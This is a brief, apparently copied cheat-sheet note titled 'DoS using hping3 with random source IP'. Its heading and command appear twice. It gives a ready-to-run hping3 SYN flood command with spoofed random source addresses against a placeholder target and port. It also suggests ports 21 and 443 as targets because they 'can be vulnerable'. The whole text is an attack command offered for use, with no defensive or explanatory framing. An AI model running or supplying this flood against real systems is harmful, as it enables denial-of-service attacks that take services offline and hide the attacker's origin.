DoS using hping3 with random source IP
`hping3 -c 10000 -d 120 -S -w 64 -p <Port> --flood --rand-source <Target>`
- YOU CAN TARGET PORT 21 and 443 because that can be vulnerable
DoS using hping3 with random source IP
`hping3 -c 10000 -d 120 -S -w 64 -p <Port> --flood --rand-source <Target>`